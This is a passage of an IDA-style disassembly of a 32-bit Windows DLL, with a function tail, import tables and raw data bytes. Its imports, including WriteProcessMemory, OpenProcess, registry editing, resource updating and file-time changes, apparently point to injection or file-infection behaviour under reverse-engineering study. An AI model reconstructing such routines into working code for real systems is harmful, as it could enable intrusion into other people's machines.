[ebp+var_14], 3 36177359 jl loc_361772B5 3617735F inc [ebp+var_10] 36177362 jmp loc_361771E4 36177367 ; ─────────────────────────────────────────────────────────────────────────── 36177367 36177367 loc_36177367: ; CODE XREF: sub_36177110+243j 36177367 inc [ebp+var_C] 3617736A jmp loc_36177194 3617736F ; ─────────────────────────────────────────────────────────────────────────── 3617736F 3617736F loc_3617736F: ; CODE XREF: sub_36177110+75j 3617736F ; sub_36177110+D8j ... 
3617736F push [ebp+var_20] 36177372 call ds:CloseHandle 36177378 36177378 loc_36177378: ; CODE XREF: sub_36177110+41j 36177378 ; sub_36177110+64j 36177378 push edi 36177379 call dword_3617AC3C 3617737F 3617737F loc_3617737F: ; CODE XREF: sub_36177110+2Dj 3617737F push 0FFFFFFFFh 36177381 push dword_3617D70C 36177387 call ds:WaitForSingleObject 3617738D mov eax, dword_3617D710 36177392 mov ecx, offset dword_3617D710 36177397 cmp eax, esi 36177399 jz short loc_361773CF 3617739B mov edi, [ebp+arg_0] 3617739E mov edx, [edi+4] 361773A1 361773A1 loc_361773A1: ; CODE XREF: sub_36177110+2A8j 361773A1 cmp [eax+4], edx 361773A4 jnz short loc_361773B0 361773A6 mov bx, [eax+2] 361773AA cmp bx, [edi+2] 361773AE jz short loc_361773BC 361773B0 361773B0 loc_361773B0: ; CODE XREF: sub_36177110+294j 361773B0 lea ecx, [eax+10h] 361773B3 mov eax, [eax+10h] 361773B6 cmp eax, esi 361773B8 jnz short loc_361773A1 361773BA jmp short loc_361773CF 361773BC ; ─────────────────────────────────────────────────────────────────────────── 361773BC 361773BC loc_361773BC: ; CODE XREF: sub_36177110+29Ej 361773BC mov edx, [eax+10h] 361773BF push eax 361773C0 push esi 361773C1 mov [ecx], edx 361773C3 push dword_3617ACB4 361773C9 call dword_3617AC70 361773CF 361773CF loc_361773CF: ; CODE XREF: sub_36177110+289j 361773CF ; sub_36177110+2AAj 361773CF push dword_3617D70C 361773D5 call ds:ReleaseMutex 361773DB pop edi 361773DC pop esi 361773DD xor eax, eax 361773DF pop ebx 361773E0 leave 361773E1 retn 4 361773E1 sub_36177110 endp 361773E1 361773E4 ; [00000006 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND] 361773EA ; [00000006 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND] 361773F0 ; [00000006 BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND] 361773F6 ; [00000006 BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND] 361773FC ; [00000006 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND] 36177402 ; [00000006 BYTES: COLLAPSED FUNCTION _strcmp. 
PRESS KEYPAD "+" TO EXPAND] 36177408 ; [000000AB BYTES: COLLAPSED FUNCTION __CRT_INIT@12. PRESS KEYPAD "+" TO EXPAND] 361774B3 ; [0000009D BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND] 36177550 ; [00000006 BYTES: COLLAPSED FUNCTION __initterm. PRESS KEYPAD "+" TO EXPAND] 36177556 dd 2AAh dup(0) 36177FFE db 2 dup(0) 36177FFE _text ends 36177FFE 36178000 ; Section 2. (virtual address 00008000) 36178000 ; Virtual size : 0000092A ( 2346.) 36178000 ; Section size in file : 00001000 ( 4096.) 36178000 ; Offset to raw data for section: 00008000 36178000 ; Flags 40000040: Data Readable 36178000 ; Alignment : 16 bytes ? 36178000 ; 36178000 ; Imports from ADVAPI32.dll 36178000 ; 36178000 ; ═══════════════════════════════════════════════════════════════════════════ 36178000 36178000 ; Segment type: Externs 36178000 ; _idata 36178000 extrn RegDeleteKeyA:dword ; DATA XREF: sub_3617206D+182r 36178004 extrn RegQueryValueA:dword ; DATA XREF: sub_36174E10+B8r 36178008 extrn RegSetValueExA:dword ; DATA XREF: sub_3617206D+32r 36178008 ; sub_3617206D+47r ... 3617800C extrn RegEnumValueA:dword ; DATA XREF: sub_3617206D+150r 3617800C ; sub_3617206D+172r ... 36178010 extrn RegCloseKey:dword ; DATA XREF: sub_3617164B+FBr 36178010 ; sub_3617164B+15Br ... 36178014 extrn RegCreateKeyExA:dword ; DATA XREF: sub_3617164B+3Cr 36178014 ; sub_36174F1E+125r ... 36178018 extrn RegEnumKeyExA:dword ; DATA XREF: sub_3617164B+51r 36178018 ; sub_3617164B+6Er ... 3617801C extrn RegOpenKeyExA:dword ; DATA XREF: sub_3617164B+B5r 3617801C ; sub_3617164B+184r ... 36178020 extrn RegQueryValueExA:dword ; DATA XREF: sub_3617164B+E1r 36178020 ; sub_3617164B+1B0r ... 36178024 36178028 ; 36178028 ; Imports from KERNEL32.dll 36178028 ; 36178028 extrn LocalAlloc:dword ; DATA XREF: sub_36172AE2+E0r 36178028 ; sub_36172AE2+E7r ... 3617802C extrn GetFileSize:dword ; DATA XREF: sub_36173618+E1r 3617802C ; sub_36173878+7Er ... 
36178030 extrn CreateThread:dword ; DATA XREF: sub_36172D72+1Er 36178030 ; sub_36176F10+11r ... 36178034 extrn ReleaseMutex:dword ; DATA XREF: sub_36172DAE+D9r 36178034 ; sub_36176F2C+1D9r ... 36178038 extrn HeapCreate:dword ; DATA XREF: _DllMain@12+14r 3617803C extrn GetLastError:dword ; DATA XREF: _DllMain@12+4Ar 3617803C ; _DllMain@12+72r ... 36178040 extrn WritePrivateProfileStringA:dword 36178040 ; DATA XREF: sub_36176C52+98r 36178044 extrn ExitProcess:dword ; DATA XREF: _DllMain@12+1B2r 36178048 extrn GetSystemTime:dword ; DATA XREF: sub_3617548D+11r 3617804C extrn HeapDestroy:dword ; DATA XREF: _DllMain@12+8Fr 3617804C ; _DllMain@12+B4r ... 36178050 extrn GetProcAddress:dword ; DATA XREF: K32_imports+1Cr 36178050 ; K32_imports+28r ... 36178054 extrn GetVersionExA:dword ; DATA XREF: sub_36174A06+1Ar 36178054 ; Get extended information about the 36178054 ; version of the operating system 36178058 extrn LoadLibraryA:dword ; DATA XREF: K32_imports+2r 36178058 ; K32_imports+Dr ... 3617805C extrn GetCurrentThreadId:dword ; DATA XREF: sub_36171000+23r 36178060 extrn CloseHandle:dword ; DATA XREF: sub_36171899+F8r 36178060 ; sub_361719A3+BFr ... 36178064 extrn WriteFile:dword ; DATA XREF: sub_36171899+A5r 36178064 ; sub_36171899+B5r ... 36178068 extrn SetFilePointer:dword ; DATA XREF: sub_36171899+7Br 36178068 ; sub_361719A3+5Cr ... 3617806C extrn CreateFileA:dword ; DATA XREF: sub_36171899+64r 3617806C ; sub_361719A3+29r ... 36178070 extrn MoveFileExA:dword ; DATA XREF: sub_36171899+1Br 36178074 extrn ReadFile:dword ; DATA XREF: sub_361719A3+50r 36178074 ; sub_361719A3+7Cr ... 36178078 extrn SetFileAttributesA:dword ; DATA XREF: sub_361719A3+13r 36178078 ; sub_361719A3+CAr ... 3617807C extrn FindClose:dword ; DATA XREF: sub_36171B36+1EEr 3617807C ; sub_3617339F+235r ... 36178080 extrn FindNextFileA:dword ; DATA XREF: sub_36171B36+149r 36178080 ; sub_3617339F+202r ... 36178084 extrn FindFirstFileA:dword ; DATA XREF: sub_36171B36+65r 36178084 ; sub_3617339F+6Er ... 
36178088 extrn WriteProcessMemory:dword ; DATA XREF: sub_36171D7C+11Fr 3617808C extrn OpenProcess:dword ; DATA XREF: sub_36171D7C+8Er 36178090 extrn GetCurrentProcessId:dword ; DATA XREF: sub_36171D7C+79r 36178090 ; sub_36171D7C+175r 36178094 extrn lstrcmpiA:dword ; DATA XREF: sub_36171D7C+54r 36178094 ; sub_36172C91+13r 36178098 extrn HeapCompact:dword ; DATA XREF: sub_36171F05+C6r 36178098 ; sub_36171F05+ECr ... 3617809C extrn Sleep:dword ; DATA XREF: sub_36171F05+8Er 3617809C ; sub_36171F05+9Ar ... 361780A0 extrn GetTickCount:dword ; DATA XREF: sub_36171F05+7Br 361780A0 ; sub_36172DAE+2Cr ... 361780A4 extrn SetThreadPriority:dword ; DATA XREF: sub_36171F05+29r 361780A4 ; sub_36176F2C+14r ... 361780A8 extrn GetCurrentThread:dword ; DATA XREF: sub_36171F05+22r 361780A8 ; sub_36176F2C+Dr ... 361780AC extrn CreateMutexA:dword ; DATA XREF: sub_36171F05+18r 361780AC ; sub_361737C9+62r ... 361780B0 extrn lstrcpyA:dword ; DATA XREF: sub_361723F1+5Er 361780B0 ; sub_361723F1+6Er ... 361780B4 extrn GetComputerNameA:dword ; DATA XREF: sub_361723F1+4Cr 361780B4 ; sub_36175AA9+142r ... 361780B8 extrn LocalFree:dword ; DATA XREF: sub_36172494+560r 361780B8 ; sub_36172494+566r ... 361780BC extrn lstrlenA:dword ; DATA XREF: sub_36172AE2+170r 361780BC ; sub_36172AE2+177r ... 361780C0 extrn LoadResource:dword ; DATA XREF: sub_36173878+194r 361780C0 ; sub_36174125+48r 361780C4 extrn LockResource:dword ; DATA XREF: sub_36173878+1A3r 361780C4 ; sub_36174125+4Fr 361780C8 extrn GetModuleHandleA:dword ; DATA XREF: sub_361748F9+2Dr 361780CC extrn WaitForSingleObject:dword ; DATA XREF: sub_36172DAE+9r 361780CC ; sub_36176F2C+16Fr ... 361780D0 extrn GetDriveTypeA:dword ; DATA XREF: sub_36173325+57r 361780D0 ; sub_36174125+8Dr 361780D4 extrn GetLogicalDrives:dword ; DATA XREF: sub_36173325+9r 361780D4 ; Get bitmask representing 361780D4 ; the currently available disk drives 361780D8 extrn FreeLibrary:dword ; DATA XREF: sub_36173878+164r 361780D8 ; sub_36173878+2AAr ... 
361780DC extrn CopyFileA:dword ; DATA XREF: sub_36173618+69r 361780DC ; sub_36173878+115r ... 361780E0 extrn GetFileAttributesA:dword ; DATA XREF: sub_36173878+515r 361780E4 extrn SetFileTime:dword ; DATA XREF: sub_36173878+50Br 361780E8 extrn GetFileTime:dword ; DATA XREF: sub_36173878+4D5r 361780EC extrn EndUpdateResourceA:dword ; DATA XREF: sub_36173878+46Cr 361780EC ; sub_361766AC+87r ... 361780F0 extrn UpdateResourceA:dword ; DATA XREF: sub_36173878+31Fr 361780F0 ; sub_36173878+330r ... 361780F4 extrn SizeofResource:dword ; DATA XREF: sub_36173878+1B8r 361780F4 ; sub_36174125+58r ... 361780F8 extrn GetWindowsDirectoryA:dword ; DATA XREF: sub_361748F9+49r 361780F8 ; sub_36176511+33r ... 361780FC extrn GetTempFileNameA:dword ; DATA XREF: sub_36173878+E0r 361780FC ; sub_36174125+10Fr ... 36178100 extrn FindResourceA:dword ; DATA XREF: sub_36173878+17Fr 36178100 ; sub_36174125+3Dr 36178104 extrn CreateProcessA:dword ; DATA XREF: sub_36174125+1CFr 36178104 ; sub_36176511+180r ... 36178108 extrn BeginUpdateResourceA:dword ; DATA XREF: sub_36173878+151r 36178108 ; sub_361766AC+56r ... 3617810C extrn LoadLibraryExA:dword ; DATA XREF: sub_36173878+137r 3617810C ; sub_36174125+30r 36178110 extrn DeleteFileA:dword ; DATA XREF: sub_36173878+F3r 36178110 ; sub_36173878+2A0r ... 36178114 extrn GetTempPathA:dword ; DATA XREF: sub_361748F9+71r 36178114 ; sub_36176511+56r 36178118 extrn GetModuleFileNameA:dword ; DATA XREF: sub_361748F9+AFr 36178118 ; sub_36176511+ACr ... 3617811C extrn GetCurrentDirectoryA:dword ; DATA XREF: sub_361748F9+98r 3617811C ; sub_36176511+7Dr 36178120 extrn GetCommandLineA:dword ; DATA XREF: sub_361748F9+7Er 36178120 ; sub_36176511+63r ... 36178124 extrn GetSystemDirectoryA:dword ; DATA XREF: sub_361748F9+5Dr 36178124 ; sub_36176511+47r 36178128 3617812C ; 3617812C ; Imports from MSVCRT.dll 3617812C ; 3617812C extrn srand:dword ; DATA XREF: sub_36171F05+82r 3617812C ; sub_36172DAE+39r ... 
36178130 extrn strncpy:dword ; DATA XREF: sub_36171000+124r 36178130 ; sub_36171000+267r ... 36178134 extrn _initterm:dword ; DATA XREF: __inittermr 36178138 extrn _adjust_fdiv:dword ; DATA XREF: __CRT_INIT@12+16r 3617813C extrn atoi:dword ; DATA XREF: sub_36172AE2+180r 36178140 extrn strrchr:dword ; DATA XREF: sub_361748F9+CFr 36178144 extrn strstr:dword ; DATA XREF: sub_3617339F+A1r 36178144 ; sub_3617339F+192r ... 36178148 extrn free:dword ; DATA XREF: sub_3617223F+Ar 36178148 ; sub_3617223F+1Cr ... 3617814C extrn malloc:dword ; DATA XREF: .text:361722FEr 3617814C ; .text:361723B2r ... 36178150 extrn sprintf:dword ; DATA XREF: .text:36172332r 36178150 ; sub_361723F1+89r ... 36178154 extrn strncat:dword ; DATA XREF: sub_36171B36+47r 36178154 ; sub_36171B36+58r ... 36178158 extrn _strlwr:dword ; DATA XREF: sub_36171B36+81r 36178158 ; sub_36171B36+15Er ... 3617815C extrn strcmp:dword ; DATA XREF: _strcmpr 36178160 extrn rand:dword ; DATA XREF: random_numgenr 36178160 ; sub_36172DAE+3Fr ... 36178164 extrn strcat:dword ; DATA XREF: _strcatr 36178168 extrn strchr:dword ; DATA XREF: sub_3617164B+12Er 36178168 ; sub_3617164B+1D0r ... 3617816C extrn memcpy:dword ; DATA XREF: _memcpyr 36178170 extrn strtok:dword ; DATA XREF: sub_36171289+37r 36178170 ; sub_36171289+71r 36178174 extrn strlen:dword ; DATA XREF: _strlenr 36178178 extrn strcpy:dword ; DATA XREF: _strcpyr 3617817C extrn memset:dword ; DATA XREF: _memsetr 36178180 36178180 36178184 ; ═══════════════════════════════════════════════════════════════════════════ 36178184 36178184 ; Segment type: Pure data 36178184 _rdata segment para public 'DATA' use32 36178184 assume cs:_rdata 36178184 ;org 36178184h 36178184 db 0 ; ; the asciiz strings below are simply the imports from KERNEL32.DLL.. 
36178184 ; 36178185 db 83h ; â 36178186 db 0 ; 36178187 db 0 ; 36178188 db 0 ; 36178189 db 0 ; 3617818A db 0 ; 3617818B db 0 ; 3617818C db 0 ; 3617818D db 0 ; 3617818E db 0 ; 3617818F db 0 ; 36178190 db 0Eh ; 36178191 db 84h ; ä 36178192 db 0 ; 36178193 db 0 ; 36178194 db 2Ch ; , 36178195 db 81h ; ü 36178196 db 0 ; 36178197 db 0 ; 36178198 db 0FCh ; ⁿ 36178199 db 81h ; ü 3617819A db 0 ; 3617819B db 0 ; 3617819C db 0 ; 3617819D db 0 ; 3617819E db 0 ; 3617819F db 0 ; 361781A0 db 0 ; 361781A1 db 0 ; 361781A2 db 0 ; 361781A3 db 0 ; 361781A4 db 76h ; v 361781A5 db 88h ; ê 361781A6 db 0 ; 361781A7 db 0 ; 361781A8 db 28h ; ( 361781A9 db 80h ; Ç 361781AA db 0 ; 361781AB db 0 ; 361781AC db 0D4h ; ╘ 361781AD db 81h ; ü 361781AE db 0 ; 361781AF db 0 ; 361781B0 db 0 ; 361781B1 db 0 ; 361781B2 db 0 ; 361781B3 db 0 ; 361781B4 db 0 ; 361781B5 db 0 ; 361781B6 db 0 ; 361781B7 db 0 ; 361781B8 db 1Ch ; 361781B9 db 89h ; ë 361781BA db 0 ; 361781BB db 0 ; 361781BC db 0 ; 361781BD db 80h ; Ç 361781BE db 0 ; 361781BF db 0 ; 361781C0 db 0 ; 361781C1 db 0 ; 361781C2 db 0 ; 361781C3 db 0 ; 361781C4 db 0 ; 361781C5 db 0 ; 361781C6 db 0 ; 361781C7 db 0 ; 361781C8 db 0 ; 361781C9 db 0 ; 361781CA db 0 ; 361781CB db 0 ; 361781CC db 0 ; 361781CD db 0 ; 361781CE db 0 ; 361781CF db 0 ; 361781D0 db 0 ; 361781D1 db 0 ; 361781D2 db 0 ; 361781D3 db 0 ; 361781D4 db 0D8h ; ╪ 361781D5 db 88h ; ê 361781D6 db 0 ; 361781D7 db 0 ; 361781D8 db 0Ah ; 361781D9 db 89h ; ë 361781DA db 0 ; 361781DB db 0 ; 361781DC db 0F8h ; ° 361781DD db 88h ; ê 361781DE db 0 ; 361781DF db 0 ; 361781E0 db 0E8h ; Φ 361781E1 db 88h ; ê 361781E2 db 0 ; 361781E3 db 0 ; 361781E4 db 84h ; ä 361781E5 db 88h ; ê 361781E6 db 0 ; 361781E7 db 0 ; 361781E8 db 0C6h ; ╞ 361781E9 db 88h ; ê 361781EA db 0 ; 361781EB db 0 ; 361781EC db 0B6h ; ╢ 361781ED db 88h ; ê 361781EE db 0 ; 361781EF db 0 ; 361781F0 db 0A6h ; ª 361781F1 db 88h ; ê 361781F2 db 0 ; 361781F3 db 0 ; 361781F4 db 92h ; Æ 361781F5 db 88h ; ê 361781F6 db 0 ; 361781F7 db 0 ; 361781F8 
db 0 ; 361781F9 db 0 ; 361781FA db 0 ; 361781FB db 0 ; 361781FC db 0C0h ; └ 361781FD db 85h ; à 361781FE db 0 ; 361781FF db 0 ; 36178200 db 28h ; ( 36178201 db 86h ; å 36178202 db 0 ; 36178203 db 0 ; 36178204 db 0CEh ; ╬ 36178205 db 85h ; à 36178206 db 0 ; 36178207 db 0 ; 36178208 db 0DEh ; ▐ 36178209 db 85h ; à 3617820A db 0 ; 3617820B db 0 ; 3617820C db 4Ah ; J 3617820D db 88h ; ê 3617820E db 0 ; 3617820F db 0 ; 36178210 db 3Ah ; : 36178211 db 88h ; ê 36178212 db 0 ; 36178213 db 0 ; 36178214 db 58h ; X 36178215 db 88h ; ê 36178216 db 0 ; 36178217 db 0 ; 36178218 db 1Eh ; 36178219 db 88h ; ê 3617821A db 0 ; 3617821B db 0 ; 3617821C db 0Eh ; 3617821D db 88h ; ê 3617821E db 0 ; 3617821F db 0 ; 36178220 db 2Ch ; , 36178221 db 88h ; ê 36178222 db 0 ; 36178223 db 0 ; 36178224 db 0ECh ; ∞ 36178225 db 87h ; ç 36178226 db 0 ; 36178227 db 0 ; 36178228 db 0DCh ; ▄ 36178229 db 87h ; ç 3617822A db 0 ; 3617822B db 0 ; 3617822C db 0FEh ; ■ 3617822D db 87h ; ç 3617822E db 0 ; 3617822F db 0 ; 36178230 db 36h ; 6 36178231 db 84h ; ä 36178232 db 0 ; 36178233 db 0 ; 36178234 db 4Ch ; L 36178235 db 84h ; ä 36178236 db 0 ; 36178237 db 0 ; 36178238 db 5Ah ; Z 36178239 db 84h ; ä 3617823A db 0 ; 3617823B db 0 ; 3617823C db 66h ; f 3617823D db 84h ; ä 3617823E db 0 ; 3617823F db 0 ; 36178240 db 78h ; x 36178241 db 84h ; ä 36178242 db 0 ; 36178243 db 0 ; 36178244 db 86h ; å 36178245 db 84h ; ä 36178246 db 0 ; 36178247 db 0 ; 36178248 db 94h ; ö 36178249 db 84h ; ä 3617824A db 0 ; 3617824B db 0 ; 3617824C db 0A0h ; á 3617824D db 84h ; ä 3617824E db 0 ; 3617824F db 0 ; 36178250 db 0B6h ; ╢ 36178251 db 84h ; ä 36178252 db 0 ; 36178253 db 0 ; 36178254 db 0C2h ; ┬ 36178255 db 84h ; ä 36178256 db 0 ; 36178257 db 0 ; 36178258 db 0D2h ; ╥ 36178259 db 84h ; ä 3617825A db 0 ; 3617825B db 0 ; 3617825C db 0E4h ; Σ 3617825D db 84h ; ä 3617825E db 0 ; 3617825F db 0 ; 36178260 db 0FAh ; · 36178261 db 84h ; ä 36178262 db 0 ; 36178263 db 0 ; 36178264 db 8 ; 36178265 db 85h ; à 36178266 db 0 ; 36178267 db 
0 ; 36178268 db 1Eh ; 36178269 db 85h ; à 3617826A db 0 ; 3617826B db 0 ; 3617826C db 2Ah ; * 3617826D db 85h ; à 3617826E db 0 ; 3617826F db 0 ; 36178270 db 38h ; 8 36178271 db 85h ; à 36178272 db 0 ; 36178273 db 0 ; 36178274 db 40h ; @ 36178275 db 85h ; à 36178276 db 0 ; 36178277 db 0 ; 36178278 db 50h ; P 36178279 db 85h ; à 3617827A db 0 ; 3617827B db 0 ; 3617827C db 64h ; d 3617827D db 85h ; à 3617827E db 0 ; 3617827F db 0 ; 36178280 db 78h ; x 36178281 db 85h ; à 36178282 db 0 ; 36178283 db 0 ; 36178284 db 88h ; ê 36178285 db 85h ; à 36178286 db 0 ; 36178287 db 0 ; 36178288 db 94h ; ö 36178289 db 85h ; à 3617828A db 0 ; 3617828B db 0 ; 3617828C db 0A8h ; ¿ 3617828D db 85h ; à 3617828E db 0 ; 3617828F db 0 ; 36178290 db 0B4h ; ┤ 36178291 db 85h ; à 36178292 db 0 ; 36178293 db 0 ; 36178294 db 0BEh ; ╛ 36178295 db 86h ; å 36178296 db 0 ; 36178297 db 0 ; 36178298 db 0AEh ; « 36178299 db 86h ; å 3617829A db 0 ; 3617829B db 0 ; 3617829C db 0C8h ; ╚ 3617829D db 87h ; ç 3617829E db 0 ; 3617829F db 0 ; 361782A0 db 0EEh ; ε 361782A1 db 85h ; à 361782A2 db 0 ; 361782A3 db 0 ; 361782A4 db 4 ; 361782A5 db 86h ; å 361782A6 db 0 ; 361782A7 db 0 ; 361782A8 db 14h ; 361782A9 db 86h ; å 361782AA db 0 ; 361782AB db 0 ; 361782AC db 0DEh ; ▐ 361782AD db 86h ; å 361782AE db 0 ; 361782AF db 0 ; 361782B0 db 36h ; 6 361782B1 db 86h ; å 361782B2 db 0 ; 361782B3 db 0 ; 361782B4 db 42h ; B 361782B5 db 86h ; å 361782B6 db 0 ; 361782B7 db 0 ; 361782B8 db 58h ; X 361782B9 db 86h ; å 361782BA db 0 ; 361782BB db 0 ; 361782BC db 66h ; f 361782BD db 86h ; å 361782BE db 0 ; 361782BF db 0 ; 361782C0 db 74h ; t 361782C1 db 86h ; å 361782C2 db 0 ; 361782C3 db 0 ; 361782C4 db 8Ah ; è 361782C5 db 86h ; å 361782C6 db 0 ; 361782C7 db 0 ; 361782C8 db 9Ch ; £ 361782C9 db 86h ; å 361782CA db 0 ; 361782CB db 0 ; 361782CC db 0B0h ; ░ 361782CD db 87h ; ç 361782CE db 0 ; 361782CF db 0 ; 361782D0 db 24h ; $ 361782D1 db 87h ; ç 361782D2 db 0 ; 361782D3 db 0 ; 361782D4 db 0CEh ; ╬ 361782D5 db 86h ; å 361782D6 
db 0 ; 361782D7 db 0 ; 361782D8 db 38h ; 8 361782D9 db 87h ; ç 361782DA db 0 ; 361782DB db 0 ; 361782DC db 0ECh ; ∞ 361782DD db 86h ; å 361782DE db 0 ; 361782DF db 0 ; 361782E0 db 4 ; 361782E1 db 87h ; ç 361782E2 db 0 ; 361782E3 db 0 ; 361782E4 db 16h ; 361782E5 db 87h ; ç 361782E6 db 0 ; 361782E7 db 0 ; 361782E8 db 8Ah ; è 361782E9 db 87h ; ç 361782EA db 0 ; 361782EB db 0 ; 361782EC db 4Ah ; J 361782ED db 87h ; ç 361782EE db 0 ; 361782EF db 0 ; 361782F0 db 60h ; ` 361782F1 db 87h ; ç 361782F2 db 0 ; 361782F3 db 0 ; 361782F4 db 78h ; x 361782F5 db 87h ; ç 361782F6 db 0 ; 361782F7 db 0 ; 361782F8 db 9Ah ; Ü 361782F9 db 87h ; ç 361782FA db 0 ; 361782FB db 0 ; 361782FC db 0 ; 361782FD db 0 ; 361782FE db 0 ; 361782FF db 0 ; 36178300 db 0CEh ; ╬ 36178301 db 83h ; â 36178302 db 0 ; 36178303 db 0 ; 36178304 db 58h ; X 36178305 db 83h ; â 36178306 db 0 ; 36178307 db 0 ; 36178308 db 1Ah ; 36178309 db 84h ; ä 3617830A db 0 ; 3617830B db 0 ; 3617830C db 26h ; & 3617830D db 84h ; ä 3617830E db 0 ; 3617830F db 0 ; 36178310 db 0F2h ; ≥ 36178311 db 83h ; â 36178312 db 0 ; 36178313 db 0 ; 36178314 db 4 ; 36178315 db 84h ; ä 36178316 db 0 ; 36178317 db 0 ; 36178318 db 0FAh ; · 36178319 db 83h ; â 3617831A db 0 ; 3617831B db 0 ; 3617831C db 0D6h ; ╓ 3617831D db 83h ; â 3617831E db 0 ; 3617831F db 0 ; 36178320 db 0E8h ; Φ 36178321 db 83h ; â 36178322 db 0 ; 36178323 db 0 ; 36178324 db 0DEh ; ▐ 36178325 db 83h ; â 36178326 db 0 ; 36178327 db 0 ; 36178328 db 0C4h ; ─ 36178329 db 83h ; â 3617832A db 0 ; 3617832B db 0 ; 3617832C db 0BAh ; ║ 3617832D db 83h ; â 3617832E db 0 ; 3617832F db 0 ; 36178330 db 0B0h ; ░ 36178331 db 83h ; â 36178332 db 0 ; 36178333 db 0 ; 36178334 db 0A8h ; ¿ 36178335 db 83h ; â 36178336 db 0 ; 36178337 db 0 ; 36178338 db 9Eh ; ₧ 36178339 db 83h ; â 3617833A db 0 ; 3617833B db 0 ; 3617833C db 94h ; ö 3617833D db 83h ; â 3617833E db 0 ; 3617833F db 0 ; 36178340 db 8Ah ; è 36178341 db 83h ; â 36178342 db 0 ; 36178343 db 0 ; 36178344 db 80h ; Ç 36178345 db 83h ; â 
36178346 db 0 ; 36178347 db 0 ; 36178348 db 76h ; v 36178349 db 83h ; â 3617834A db 0 ; 3617834B db 0 ; 3617834C db 6Ch ; l 3617834D db 83h ; â 3617834E db 0 ; 3617834F db 0 ; 36178350 db 62h ; b 36178351 db 83h ; â 36178352 db 0 ; 36178353 db 0 ; 36178354 db 0 ; 36178355 db 0 ; 36178356 db 0 ; 36178357 db 0 ; 36178358 db 0C1h ; ┴ 36178359 db 2 ; 3617835A aStrncpy db 'strncpy',0 36178362 db 99h ; Ö 36178363 db 2 ; 36178364 aMemset db 'memset',0 3617836B db 0 ; 3617836C db 0BAh ; ║ 3617836D db 2 ; 3617836E aStrcpy db 'strcpy',0 36178375 db 0 ; 36178376 db 0BEh ; ╛ 36178377 db 2 ; 36178378 aStrlen db 'strlen',0 3617837F db 0 ; 36178380 db 0C7h ; ╟ 36178381 db 2 ; 36178382 aStrtok db 'strtok',0 36178389 db 0 ; 3617838A db 97h ; ù 3617838B db 2 ; 3617838C aMemcpy db 'memcpy',0 36178393 db 0 ; 36178394 db 0B7h ; ╖ 36178395 db 2 ; 36178396 aStrchr db 'strchr',0 3617839D db 0 ; 3617839E db 0B6h ; ╢ 3617839F db 2 ; 361783A0 aStrcat db 'strcat',0 361783A7 db 0 ; 361783A8 db 0A6h ; ª 361783A9 db 2 ; 361783AA aRand db 'rand',0 361783AF db 0 ; 361783B0 db 0B8h ; ╕ 361783B1 db 2 ; 361783B2 aStrcmp db 'strcmp',0 361783B9 db 0 ; 361783BA db 0C3h ; ├ 361783BB db 1 ; 361783BC a_strlwr db '_strlwr',0 361783C4 db 0BFh ; ┐ 361783C5 db 2 ; 361783C6 aStrncat db 'strncat',0 361783CE db 0B4h ; ┤ 361783CF db 2 ; 361783D0 aSrand db 'srand',0 361783D6 db 5Eh ; ^ 361783D7 db 2 ; 361783D8 aFree db 'free',0 361783DD db 0 ; 361783DE db 0B2h ; ▓ 361783DF db 2 ; 361783E0 aSprintf db 'sprintf',0 361783E8 db 91h ; æ 361783E9 db 2 ; 361783EA aMalloc db 'malloc',0 361783F1 db 0 ; 361783F2 db 3Dh ; = 361783F3 db 2 ; 361783F4 aAtoi db 'atoi',0 361783F9 db 0 ; 361783FA db 0C5h ; ┼ 361783FB db 2 ; 361783FC aStrstr db 'strstr',0 36178403 db 0 ; 36178404 db 0C3h ; ├ 36178405 db 2 ; 36178406 aStrrchr db 'strrchr',0 3617840E aMsvcrt_dll db 'MSVCRT.dll',0 36178419 db 0 ; 3617841A db 0Fh ; 3617841B db 1 ; 3617841C a_initterm db '_initterm',0 36178426 db 9Dh ; ¥ 36178427 db 0 ; 36178428 a_adjust_fdiv db 
'_adjust_fdiv',0 36178435 db 0 ; 36178436 db 0FAh ; · 36178437 db 0 ; 36178438 aGetcurrentthre db 'GetCurrentThreadId',0 3617844B db 0 ; 3617844C db 1Bh ; 3617844D db 0 ; 3617844E aClosehandle db 'CloseHandle',0 3617845A db 0DFh ; ▀ 3617845B db 2 ; 3617845C aWritefile db 'WriteFile',0 36178466 db 6Ah ; j 36178467 db 2 ; 36178468 aSetfilepointer db 'SetFilePointer',0 36178477 db 0 ; 36178478 db 34h ; 4 36178479 db 0 ; 3617847A aCreatefilea db 'CreateFileA',0 36178486 db 0DEh ; ▐ 36178487 db 1 ; 36178488 aMovefileexa db 'MoveFileExA',0 36178494 db 18h ; 36178495 db 2 ; 36178496 aReadfile db 'ReadFile',0 3617849F db 0 ; 361784A0 db 68h ; h 361784A1 db 2 ; 361784A2 aSetfileattribu db 'SetFileAttributesA',0 361784B5 db 0 ; 361784B6 db 90h ; É 361784B7 db 0 ; 361784B8 aFindclose db 'FindClose',0 361784C2 db 9Dh ; ¥ 361784C3 db 0 ; 361784C4 aFindnextfilea db 'FindNextFileA',0 361784D2 db 94h ; ö 361784D3 db 0 ; 361784D4 aFindfirstfilea db 'FindFirstFileA',0 361784E3 db 0 ; 361784E4 db 0E9h ; Θ 361784E5 db 2 ; 361784E6 aWriteprocessme db 'WriteProcessMemory',0 361784F9 db 0 ; 361784FA db 0EFh ; ∩ 361784FB db 1 ; 361784FC aOpenprocess db 'OpenProcess',0 36178508 db 0F8h ; ° 36178509 db 0 ; 3617850A aGetcurrentproc db 'GetCurrentProcessId',0 3617851E db 0FFh ; 3617851F db 2 ; 36178520 aLstrcmpia db 'lstrcmpiA',0 3617852A db 9Ah ; Ü 3617852B db 1 ; 3617852C aHeapcompact_0 db 'HeapCompact',0 36178538 db 96h ; û 36178539 db 2 ; 3617853A aSleep db 'Sleep',0 36178540 db 6Dh ; m 36178541 db 1 ; 36178542 aGettickcount db 'GetTickCount',0 3617854F db 0 ; 36178550 db 87h ; ç 36178551 db 2 ; 36178552 aSetthreadprior db 'SetThreadPriority',0 36178564 db 0F9h ; ∙ 36178565 db 0 ; 36178566 aGetcurrentth_0 db 'GetCurrentThread',0 36178577 db 0 ; 36178578 db 3Fh ; ? 
